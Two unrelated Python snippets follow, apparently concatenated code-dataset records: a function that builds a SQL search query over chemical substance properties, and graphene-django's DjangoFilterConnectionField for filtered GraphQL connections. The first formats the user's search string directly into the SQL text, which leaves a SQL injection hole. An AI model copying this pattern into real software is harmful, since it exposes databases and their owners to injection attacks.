def getQueryBySearchNameFormulaOrCas(s: str) -> str: table_name = "v_all_properties_including_correlations s" table_name += " INNER JOIN substance sub ON sub.cas=s.cas LEFT JOIN substance_name_aliases a on sub.substance_id=a.substance_id" query = """SELECT DISTINCT s.formula, s.name, s.cas, s.molar_weigth, s.tfp_k, s.tb_k, s.tc_k, s.pc_bar, s.vc_cm3_per_mol, s.zc, s.omega, s.cp_trange, s.cp_a0, s.cp_a1, s.cp_a2, s.cp_a3, s.cp_a4, s.cpig, s.cpliq, s.antoine_a, s.antoine_b, s.antoine_c, s.pvpmin_bar, s.tmin_k, s.pvpmax_bar, s.tmax_k FROM {0} WHERE s.name LIKE '%{1}%' OR s.formula LIKE '%{1}%' OR s.cas LIKE '%{1}%' OR a.alias LIKE '%{1}%' ORDER BY (s.name='{1}') DESC, length(s.name)""".format( table_name, s ) return query
py
7dfd20a12a9b0978b0a76e1f0262c94ac48cd953
from collections import OrderedDict from functools import partial from graphql.error import GraphQLError from graphene.types.argument import to_arguments from ..fields import DjangoConnectionField from .utils import get_filtering_args_from_filterset, get_filterset_class class DjangoFilterConnectionField(DjangoConnectionField): def __init__( self, type, fields=None, order_by=None, extra_filter_meta=None, filterset_class=None, *args, **kwargs ): self._fields = fields self._provided_filterset_class = filterset_class self._filterset_class = None self._extra_filter_meta = extra_filter_meta self._base_args = None super(DjangoFilterConnectionField, self).__init__(type, *args, **kwargs) @property def args(self): return to_arguments(self._base_args or OrderedDict(), self.filtering_args) @args.setter def args(self, args): self._base_args = args @property def filterset_class(self): if not self._filterset_class: fields = self._fields or self.node_type._meta.filter_fields meta = dict(model=self.model, fields=fields) if self._extra_filter_meta: meta.update(self._extra_filter_meta) self._filterset_class = get_filterset_class( self._provided_filterset_class, **meta ) return self._filterset_class @property def filtering_args(self): return get_filtering_args_from_filterset(self.filterset_class, self.node_type) @classmethod def merge_querysets(cls, default_queryset, queryset): # There could be the case where the default queryset (returned from the filterclass) # and the resolver queryset have some limits on it. # We only would be able to apply one of those, but not both # at the same time. # See related PR: https://github.com/graphql-python/graphene-django/pull/126 assert not ( default_queryset.query.low_mark and queryset.query.low_mark ), "Received two sliced querysets (low mark) in the connection, please slice only in one." assert not ( default_queryset.query.high_mark and queryset.query.high_mark ), "Received two sliced querysets (high mark) in the connection, please slice only in one." low = default_queryset.query.low_mark or queryset.query.low_mark high = default_queryset.query.high_mark or queryset.query.high_mark default_queryset.query.clear_limits() queryset = super(DjangoFilterConnectionField, cls).merge_querysets( default_queryset, queryset ) queryset.query.set_limits(low, high) return queryset @classmethod def connection_resolver( cls, resolver, connection, default_manager, max_limit, enforce_first_or_last, filterset_class, filtering_args, root, info, **args ): filter_kwargs = {k: v for k, v in args.items() if k in filtering_args} filterset = filterset_class( data=filter_kwargs, queryset=default_manager.get_queryset(), request=info.context, ) if not (filterset.is_bound and filterset.form.is_valid()): exc = { str(key): [str(e.message) for e in error_list] for key, error_list in filterset.form.errors.as_data().items() } raise GraphQLError(exc) qs = filterset.qs return super(DjangoFilterConnectionField, cls).connection_resolver( resolver, connection, qs, max_limit, enforce_first_or_last, root, info, **args ) def get_resolver(self, parent_resolver): return partial( self.connection_resolver, parent_resolver, self.type, self.get_manager(), self.max_limit, self.enforce_first_or_last, self.filterset_class, self.filtering_args, )